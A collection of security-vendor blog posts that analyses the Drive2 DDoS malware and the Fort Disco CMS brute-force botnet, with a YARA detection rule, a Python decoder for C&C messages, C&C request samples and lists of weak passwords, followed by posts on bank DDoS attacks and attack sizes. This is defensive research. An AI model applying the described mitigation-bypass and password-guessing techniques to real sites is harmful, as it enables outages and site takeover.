This version proved slightly more difficult to reverse than the first version with IDR not recognizing many of the standard Delphi library functions – possibly due to the Delphi version – when it was generating the IDC script to load into IDA Pro. Additionally, the first sample analyzed caused IDA Pro numerous problems, including failing to recognize local variables, but subsequent samples did not have those issues. Thankfully, BinDiff was useful when comparing against my IDB of the original version to identify both the Delphi library functions and all of my existing tagged global variables and previously reversed functions. Using that, the new command encoding became much easier to find. A yara rule to identify this version is below and is also in the ASERT Github repository:

rule dirtjumper_drive2
{
 strings:
   $cmd1 = "-get" fullword
   $cmd2 = "-ip" fullword
   $cmd3 = "-ip2" fullword
   $cmd4 = "-post1" fullword
   $cmd5 = "-post2" fullword
   $cmd6 = "-udp" fullword
   $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
   $str2 = "-timeout" fullword
   $str3 = "-thread" fullword
   $str4 = " Local; ru) Presto/2.10.289 Version/"
   $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
   $newver1 = "-icmp"
   $newver2 = "-byte"
   $newver3 = "-long"
   $newver4 = "<xmp>"
 condition:
   4 of ($cmd*) and all of ($str*) and all of ($newver*)
}

Attack Command Structure Change

The old style of DirtJumper and Drive phone home was a simple POST request with a single parameter named k and was either 15 or 34 bytes long. This new version now renamed k to req and still uses a 15-byte bot identifier. Along with this change there is now another, different POST request that has been observer to both precede and follow the the request for targets from the server. This request sends a hard-coded string - newd=1 – as the POST  data and is returned what appear to be a list of backup URLs to use in the event that the main CnC server goes down.

The string encoding detailed in the previous post still holds for all strings except for the CnC information. Previously, the CnC host and URI were specified as separate strings, but they are now specified as a full URL that uses the same encoding method as the attack commands from the CnC. First, the information is XOR-encoded with a static key (in all samples seen so far, “okokokjjk” is the XOR key used) and then it is Base64-encoded. I did manage to waste a couple of hours reversing their slightly abnormal Base64 decoder to verify that it was indeed a standard Base64 decoder. Given that all the CnCs are specified in URL format and all of the URLs so far start with http://, it is possible to determine the first 7 bytes of the XOR key without running the sample or searching for the key. Once the sample is run, the rest of the XOR key can easily be found. An example function to decode messages sent from the CnC is below:

 

def decode_comms(message,key='okokokjjk'):
 message = base64.b64decode(message)
 decoded_message = ""
 for i in range(len(message)):
   decoded_message += chr(ord(message[i]) ^ ord(key[i % len(key)]))
 return decoded_message

 

An example response from a server might look something like:

28
QhgCCh0fSgIfGxtVREAcHR1FChMOBh8HD0QIAAZA
0

where 0×28 is the length of the message and when decoded look like the same as the first version:

-smart hxxp://www.example.com/

 

New Attacks

The new variant has four new attacks: -icmp, -byte, -long, and -smart. Of these, the most interesting is the -smart attack which attempts to incorporate some DDoS mitigation bypass techniques and this is the first piece of DDoS malware that ASERT has seen that attempts to do this. The least interesting attack is the -icmp attack which sends a standard icmp echo request towards the target host.

There was also one new option added to the existing attacks in this version: a -cookie parameter where the attacker can choose to specify a specific or randomly generated cookie value with the attack.

Byte and Long

The byte attack looks to be a variant of the previously discussed -ip and -ip2 attacks where only one random lowercase alpha byte is sent before the socket is closed instead of the other payloads. It is not clear what the purpose of such an attack is as they have only been witnessed targeting port 80 and the existing IP attack allows for sending small payloads as well.

Drive2 Byte Attack ASM Code

Drive2 Byte Attack ASM Code

The -long attack is more interesting and as its name implies, attempts to keep a socket open for a long period of time while also sending a decent amount of data during that time. A random payload is generated, sent and then randomly sleeps for 2 to 6 seconds before executing the send up to 10240 times. It seems unlikely that this attack will succeed for the maximum time as most services will close a socket upon receiving malformed data defined by their service, but it is possible some may not and allow the attack to continue long enough to exhaust available connections.

Smart Attack

The smart attack has only been seen in one sample so far and has been observed when ordering attacks against sites. The attack sends an initial attack packet and then looks for either a Set-Cookie or a Location header and will parse out either the Cookie value or new URL location using those values in the next packet it sends. It will also look for a meta equiv refresh tag, location= or document.location.href inside of the response from the server in an attempt to defeat mitigations using those countermeasures as well.

This is one of, if not the, first pieces of DDoS malware that ASERT has seen actively attempt to defeat known mitigation techniques.

When parsing out the Set-Cookie header, there is a lot of convoluted calls to @LStrPos and @LStrLen as it searches for the relevant parts of the cookie value. Once all that is sorted, it will then store the cookie value in the global cookie array for the attack and that cookie value will be available to all subsequent requests sent to the server as part of the attack. The other parsing mechanisms perform similarly with respect to redirects – they store the new location in the global variable so the next time the attack is run it will target the proper path. It will also check for the existence of the mitigation options each time a request is sent. While this adds some overhead, it will also ensure that the attack packets have a high chance of getting through.

After parsing out the appropriate value to bypass, the attack will build a new HTTP request to send and also generate a new random User-Agent that will be used in the new attack. The assembly code for this can be seen below in Figure 2. There are some weaknesses in the implementation of the parsing sections of this attack that can be manipulated by an endpoint as well.

Drive2 Bypass Request Construction

Drive2 Bypass Request Construction

Conclusion

Just as the first version of Drive raised the bar for DirtJumper variants, this version looks to be raising the bar for DDoS malware in general with its purposeful attempts at bypassing mitigations with its new -smart attack.  We expect that this is just the first of many pieces of malware to attempt to incorporate these bypass techniques and also expect that Drive will continue to evolve and attempt to improve its techniques for such bypass attacks.

Related md5: fd94080ea9aa6e69f46f59b87a4fba88

Fort Disco Bruteforce Campaign

By: Matthew Bing -

In recent months, several researchers have highlighted an uptick in bruteforce password guessing attacks targeting blogging and content management systems. Arbor ASERT has been tracking a campaign we are calling Fort Disco that began in late May 2013 and is continuing. We’ve identified six related command-and-control (C&C) sites that control a botnet of over 25,000 infected Windows machines. To date, over 6,000 Joomla, WordPress, and Datalife Engine installations have been the victims of password guessing.

Background

Understanding an attack campaign by only analyzing a malware executable file is a Sisyphean task. The malware alone can be picked apart by disassemblers, poked and prodded in a sandbox, but by itself offers no clues into the size, scope, motivation, and impact of the attack campaign. It’s much like a historian finding a discarded weapon on an ancient battlefield. Several things can be inferred, but painting a complete picture is difficult.

Researchers have several techniques at their disposal to gauge the size of a botnet. They can sinkhole discarded domains or monitor traffic to live attack sites to observe infected hosts checking in to a C&C site. In rare instances, the controller of a botnet may inadvertently leave clues publicly accessible for anyone to observe.

ftdisco

The controller of the campaign we call Fort Disco, named after one of the strings found in the PE metadata field, inadvertently left publicly accessible log files that lay out a complete picture of the campaign. There are six C&C sites that we believe are related. The sites either share a subdomain or are co-hosted with each other, and have similar structures.

Windows Malware

There are at least four variants of the Windows malware related to the Fort Disco campaign. A newly infected machine registers with the C&C site hardcoded into the malware:

> POST /cmd.php HTTP/1.0
>
> status=0

The malware then checks in to receive commands:

> GET /cmd.php HTTP/1.0
< 1
< 30
< http://[xxx]/10823.txt
< qazxsw
< 480

The command structure can vary, but the important commands are the third and fourth lines. The third line is a URL of a list of sites to attack. We’ve observed the target list being anywhere from 5,000 to 10,000 sites at a time. The C&C tends to give out the same list to multiple infections.

The fourth line is the password to use, and in some cases can be a URL to a password list. What’s particularly interesting about this bruteforce list is that it supports the dynamic values {domain} and {zone}. These values are replaced with the targets domain name and top-level zone, respectively. For instance, if the malware were targeting a blog at www.example.com and was configured to use “{domain}” as a password, the malware would attempt logging in with the password “example”. We’ve observed the password lists being used anywhere from 150 to 1,000 entries.

The malware has a URL of usernames hardcoded. The list is small, anywhere from one to five, and usually consists of “admin” or “administrator”. The login names also support {domain} values.

The malware will attempt to login to the target list with combinations of the supplied usernames and passwords. Successful username/password combinations are reported back to the C&C by posting to the file /bruteres.php. Results are appended to a text file publicly accessible via the web.

dir

It’s unclear exactly how the malware gets installed. We were able to find reference to the malware’s original filename (maykl_lyuis_bolshaya_igra_na_ponizhenie.exe) that referred to Michael Lewis’ book “The Big Short: Inside The Doomsday Machine” in Russian with an executable attachment. Another filename, proxycap_crack.exe, refers to a crack for the ProxyCap program. It’s unclear if victims were enticed to run these files, and if so, if that is the only means of infection. The C&C sites did not offer additional clues as to the infection mechanism.

cnc

 

Activity to the C&C sites continues. The above chart from Umbrella Security Graph’s passive DNS data show regular and continuing requests for this particular C&C domain name.

The log files found on the C&C sites included the IP addresses of victims. Some level of skepticism is required, since we are analyzing data that could have been altered by the attacker. We found 25,611 unique IP addresses connecting to the six C&C sites. Mitigating factors such as double-counting infections behind a NAT, and infected machines changing IP addresses may affect the final tally.

The top three countries with infections are the Philippines, Peru, and Mexico. Interestingly, it seems the United States and Western Europe are underrepresented. For an interactive map showing infected clients, click here.

Compromised Sites

Continuing to analyze the logs recovered from the C&C, we were able to compile a list of usernames and passwords for 6,127 sites.  Only three types of platforms were targeted: Joomla (/administrator/index.php), WordPress (/wp-login.php), and Datalife Engine (/admin.php).


blogs

The attacker chooses the sites to attack, which based on the top ten top-level domains where usernames and passwords are listed, appear to favor Russia:

Top-Level Domain Number
RU 2582
COM 1601
UA 348
NET 329
ORG 254
INFO 110
KZ 99
US 84
BY 76
xn--p1ai 65

The top ten passwords for these sites seem to indicate that these are targets of opportunity as these passwords are the “weakest of the weak”.

Password Number
admin 893
123456 588
123123 371
12345 360
{domain} 248
pass 218
123456789 171
1234 150
abc123 136
123321 131

 

With the compromised credentials, the commander of the botnet also installed a variant of the “FilesMan” PHP backdoor on to 788 of the sites. This password-protected backdoor allows the attacker to browse the filesystem, upload or download files, and execute commands.

The ultimate intent of the campaign remains unclear. On several compromised sites we found two tools:

• A simple PHP-based redirector that sends browsers running Windows with either “MSIE”, “Firefox”, or “Opera” in the User-Agent to a website through several more layers of redirection ultimately landing on a Styx exploit kit.
• A WordPress plugin and supporting library to import posts from a Tumblr blog.

We were not able to find any evidence that the tools were actually used, but based on their nature, we can speculate that the intent of the attacker is to serve exploit kits on these compromised sites.

Attribution

There are several clues that lead us to believe the owner is based in a post-Soviet state:

• The majority of the sites targeted are in Russia or the Ukraine.
• All of the C&C sites are hosted in Russia or the Ukraine.
• A Russian error string was found on several C&C sites. “Не могу подключиться к базе данных!”, which translates to “Unable to connect to database!”
• Although this appears to be the default, the character set of the FilesMan backdoor is set to “Windows-1251”, or the Cyrillic code page.
• The Datalife Engine platform appears to be popular in Russia.

Conclusion

Beginning with the Brobot attacks in early 2013, we’ve seen attackers focusing on targeting blogs and content management systems. This marks a tactical change in exploiting weak passwords and out-of-date software on popular platforms.  By uploading a PHP shell to compromised sites, an attacker can easily issue commands to thousands of compromised sites in seconds.

Blogs and CMSs tend to be hosted in data centers with immense network bandwidth. Compromising multiple sites gives the attacker access to their combined bandwidth, much more powerful than a similarly sized botnet of home computers with limited network access by comparison. While we have no evidence the Fort Disco campaign is related to Brobot or denial-of-service activity, we’ve experienced the threat that a large blog botnet can deliver.

Related MD5 Hashes

722a1809bd4fd75743083f3577e1e6a4
750708867e9ff30c6b706b7f86eb67b5
976f77d6546eb641950ef49a943449f1
062dae6ee87999552eae4bb37cdec5d4
7931709fd9b84bbb1775afa2f9dff13a
9b8b185ce66b6887cc19149258ba1d1b

Lessons learned from the U.S. financial services DDoS attacks

By: Arbor Networks -

By Dan Holden and Curt Wilson of Arbor’s Security Engineering & Response Team (ASERT)

During the months of September and October we witnessed targeted and very serious DDoS attacks against U.S. based financial institutions. They were very much premeditated, focused, advertised before the fact, and executed to the letter.

In the case of the September 2012 DDoS attack series, many compromised PHP Web applications were used as bots in the attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools. Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands. In the September 2012 attacks there were several PHP based tools used, the most prominent of which was “Brobot” along with two other tools, KamiKaze and AMOS which were used a bit less often.  Brobot has also been referred to as “itsoknoproblembro”.

The attack tactics observered were a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols. The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, to multiple companies in the same vertical.

On December 10, 2012 the group claiming responsibility for the prior attacks, the Izz ad-Din al-Qassam Cyber Fighters announced “Phase 2 Operation Ababil”.  A new wave of attacks were announced on their Pastebin page:  which described their targets as follows:

“Continually, the goals under attacks of this week are including: U.S. Bancorp, JPMorgan Chase&co, Bank of America, PNC Financial Services Group, SunTrust Banks, Inc.”

On December 11, 2012, attacks on several of these victims were observed. Some attacks looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2.

These attacks have shown why DDoS continues to be such a popular and effective attack vector. Yes, DDoS can take the form of very large attacks. In fact, some of this week’s attacks have been as large as 60Gbps. What makes these attacks so significant is not their size, but the fact that the attacks are quite focused, part of an ongoing campaign, and like most DDoS attacks quite public. These attacks utilize multiple targets, from network infrastructure to Web applications.

Lessons Learned

While there has been much speculation about who is behind these attacks, our focus is less on the who or why, but how we can successfully defend. There are multiple lessons to be learned from these attacks, by everyone involved – the targeted enterprises, their managed security providers, Website and Web application administrators, and the vendor community.

For enterprises, it is clear that typical perimeter defenses such as firewalls and IPS are not effective when dealing with DDoS attacks, as each technology inline to the target is actually a potential bottleneck. These devices can be an important part of a layered defense strategy but they were built for problems far different than today’s complex DDoS threat. Given the complexity of today’s threat landscape, and the nature of application layer attacks, it is increasingly clear that enterprises need better visibility and control over their networks which require a purpose built, on-premise DDoS mitigation solution. This could sound self-serving, however, visibility into a DDoS attack needs to be far better than the first report of your Website or critical business asset going down. Without real-time knowledge of the attack, defense and recovery becomes increasingly difficult.

For providers of managed security services, they have begun to evaluate their deployments and mitigation capacity. These attacks were unique in that they targeted multiple organizations within the same vertical, putting a strain on the capacity of provider’s cloud-based mitigation services.

What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats. The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success. There have certainly been cases where the MSSP was successful at mitigating against an attack but the target Website still went down due to  corruption of the underlying application and data. In order to defend networks today, enterprises need to deploy DDoS security in multiple layers, from the perimeter of their network to the provider cloud, and ensure that on-premise equipment can work in harmony with provider networks for effective and robust attack mitigation.

 

Syria goes dark

By: Darren Anstee -

UPDATE: Syria’s back online

 

ORIGINAL POST

The ATLAS infrastructure leverages Arbor Networks’ world-wide service provider customer base to gather data about Internet traffic patterns and threats.  Currently 246 of Arbor’s customers are actively participating in the ATLAS program, and are sharing data on an hourly basis.

The data shared includes information on the traffic crossing the boundaries of participating networks, and the kinds of DDoS attacks they are seeing. The graph below shows the cumulative ‘total’ traffic ( to / from) Syria across all of these participating networks. This does not show the total traffic into and out of Syria, this is simply a snapshot taken from the vantage point of 246 network operators around the world. As you can see traffic drops to virtually nothing earlier on today.  The actual traffic interruption is likely to have occurred between 1000 and 1100 today, the graphs show traffic interruption an hour later than this due to the variable, hourly reporting from ATLAS participants to our servers.

(UPDATED: as of 5:50am ET on 12/1/12)

 

As a reminder, this is not the first time we have seen a complete cut off of Internet access in the Middle East. You may recall back in January 2011, something similar occurred in Egypt,

 

How likely is a DDoS Armageddon attack?

By: Carlos Morales -

The recent DDoS attacks against many of the North American financial firms had some unique characteristics that put a strain on the defenses in place and resulted in a number of well publicized service outages. The escalating threat is not new.  It’s been steadily building up over the last few years as botnet command and control has matured, the tools available to exploit those botnets have gone mainstream, and the cost of using the tools has plummeted.  What the attacks did do is raise the industry’s collective consciousness around how bad the situation has gotten.    The effectiveness of the attacks has changed the way that Internet operators, whether service provider, hosting provider, government or enterprise think about their defenses.   It has also raised a number of troubling questions.

The most common question that I have been asked is around the growing size of attacks and the capacity of Internet operators to withstand such threats.   How big does an attack have to be to overwhelm the biggest, most prepared financial company?   How big does an attack have to be to overwhelm the biggest and most prepared service provider?   Is there an Armageddon attack on the horizon that threatens to take down the entire Internet?  There are indications that this could be the case.

It should be noted that size is by no means the only means by which an attack can be effective.  It’s a very visible way of taking down a network similar to the way a 7 mile backup on a local highway is a visible sign that you’re not getting to your destination quickly.   Application layer attacks, IP protocol attacks, connection attacks and other stealthy attack methods can be just as effective in taking down a victim while being much more difficult to detect and mitigate.  The financial sector attacks were multi-vector and had aspects of both volumetric and application layer attack traffic.

This article is going to focus on larger sized attacks and the possibility of an Armageddon attack.   First, there are a few different measures of size including bandwidth (bps), packets (pps) and connections (cps).    In all three cases Internet operators such as enterprises will have a limit which they can handle.   Bps is the most commonly considered measure of size and it is easy to estimate network bandwidth limits.  If the internet operator has 10Gbps worth of upstream bandwidth, then attacks bigger than this will overwhelm the links.   Packet per second (pps) limits are more of a challenge to estimate limits because each device that is in-line with traffic will have limits in handling pps that will be dependent on the configurations that they are running and the type of traffic seen.   High pps attacks often cause more challenges than high bps attacks because multiple bottlenecks may exist on the network.     High cps attacks are typically targeted at stateful devices on the network that have a connection table.   These tend to be the harder to measure because network traffic analyzers tend to focus on just bps or pps.

With all three attack types, all enterprise, government and hosting provider networks will have bottlenecks that can be over-run relatively easily by big DDoS attacks.  Most enterprise and government datacenters have no more than 10 Gbps with some ranging slightly higher than this.   Arbor Network frequently sees attacks much larger than this.  As an example, Arbor’s ATLAS system receives anonymous attack statistics from hundreds of Arbor Peakflow SP deployments.   The largest bandwidth attacks measured in 2011 and 2012 were 101.4 Gbps and 100.8 Gbps respectively.   The largest packet per second attacks measured in 2011 and 2012 were 139.7 Mpps and 82.4 Mpps respectively.   Another source of data is the annual security survey of Internet operators that Arbor runs.   One of the survey questions is about the largest bps attacks seen over the previous year.    The chart below reflects that biggest attacks reported each year since the survey was first conducted in 2002.

Based on the data from the chart above, there have been DDoS attacks capable of overwhelming a 10 Gbps datacenter since 2005.   All this means that enterprises, governments and hosting providers need help from their upstream service providers to deal with threats of this magnitude.   Many of these providers offer managed security services that will provide protection against bigger attacks.   At a certain point, the attacks are big enough that the providers consider them their responsibility anyways because of the potential impact to multiple customers.  However, it’s heavily recommended to have an agreement in place to ensure SLAS and guaranteed response times.

That brings me back to the question on whether an Armageddon attack is possible that can not only overwhelm the end victim but also all the Internet providers in between.   Based on the current Internet environment, this is all too possible.   The first thing that you need to consider what the available bandwidth is to generate an attack.   There have been botnets discovered that have contained more than 1M infected hosts.   Assuming an average of 1 Mbps worth of upstream access per host, a conservative estimate based on the number of broadband subscribers, 4G and 3G users deployed in the world, a 1M host botnet could generate an attack of 1 Tbps.   Now what if this botnet and multiple other large botnets attack at the same time?   Service providers have a lot of bandwidth throughout their network but there are limits to how much traffic they can handle.   Attacks of that magnitude described would have profound effect on the Internet as a whole exploiting bottlenecks in many places simultaneously.  No single service provider, even the largest tier ones, would be able to handle all this traffic without adversely affecting their user base.

Is this possible?  It certainly seems so.  Is it likely?   It doesn’t seem so since it would affect everyone on the Internet and not just a single victim.   That said, many attacks that didn’t seem likely before are now becoming commonplace as motivations have shifted.   It is something that CSOs from within the carrier community are likely considering and hopefully taking steps to plan for the worst.

 

Go Back In Time →